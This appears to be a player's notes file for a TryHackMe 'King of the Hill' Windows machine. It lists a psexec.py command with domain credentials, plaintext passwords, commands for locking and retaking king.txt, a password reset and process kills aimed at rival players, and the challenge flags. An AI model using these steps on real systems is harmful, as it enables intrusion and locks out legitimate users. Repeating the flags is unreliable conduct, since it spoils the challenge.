# Offline -->

# msfconsole

can go straight to system with psexec.py kingofthe.domain/svc_robotarmy:robots@<ip>
  
# Users

// ssh: svc_robotarmy

scara:LeagueIsMyLove

toast:IsItHotInHere,OrIsItJustMe

mykull:NightmareNightmareNightmareNightmare

fed:OfflineTV2020


# Paths

king.txt, under Administrator/king-server/, can be made immutable with the attrib +r king.txt command.
note the icacls command could also be used to mess with permissions. can use takeown /f .\king.txt as a quick recover if someone else has taken over the file

when dealing with dicks do the following:

net user svc_robotarmy sdfsjkfskkjiouuiyeruiysdf
[establish a russh shell]
taskkill /f /pid powershell.exe
taskkill /f /pid cmd.exe

# Flags:

THM{95B20C5626EB94E68812FF93A6F8B7A0}

THM{02592D82BBA02DE324F72496B393D16F}

THM{89F288757F4D0693C99B007855FC075E}

THM{44EF79C7857DAFEC76F6E3F0F3263060}

THM{1A44E1ED498294F9AA218F1742A160AA}

THM{C7914ACADABBCA1DE6287BD624953BA6}

THM{4F2900F2FDFAF3F77BD599391218F49F}

THM{7878847D55C22F58E3A702FC10D98C54}
